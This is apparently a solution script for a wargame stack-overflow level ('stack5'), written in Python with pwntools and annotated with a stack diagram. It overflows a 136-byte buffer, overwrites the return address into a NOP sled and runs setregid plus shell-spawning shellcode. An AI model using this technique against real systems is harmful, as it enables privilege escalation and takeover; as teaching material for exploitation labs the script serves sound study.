from pwn import *

context.update(arch='amd64')

off = 136
# we obtain the address of the buffer by running the program in gdb.
# We don't pay any attention to the environment.
buffer =  0x7fffffffe3b0

# we run the process without flushing the environemnt
io = process("/home/stack5/stack5")

# length of the NOP-sled
nopsled = 1000

# We try to jump in the middle of the nopsled (the * below)
# assuming that we know the address of buffer. We can tolerate
# errors of +/- nopsled/2 bytes in our guess of buffer.
#
#                 +-----------+  ^
#      buffer  -> | AAAAAAAA  |  |
#                 | AAAAAAAA  |  |
#                 | AAAAAAAA  | off
#                 ~           ~  |
#   initial rsp ->| AAAAAAAA  |  |
#                 +-----------+  V
#           +-----|   rip     |
#           |     +-----------+  ^
#           |     | nop ...   |  |
#           |     |           |  |
#           |     ~           ~  nopsled
#           * --> |           |  |
#                 |           |  |
#                 | ... nop   |  V
#                 | shellcode |
#                     ...
#
# Note also that when the shellcode starts executing rsp will
# still point above it, so we don't have to reserve space for
# shellcode's pushes.

payload  = b"A" * off
payload += p64(buffer + off + 8 + nopsled // 2)
payload += asm("nop") * nopsled
payload += asm(shellcraft.setregid())
payload += asm(shellcraft.sh())

io.sendline(payload)
io.interactive()
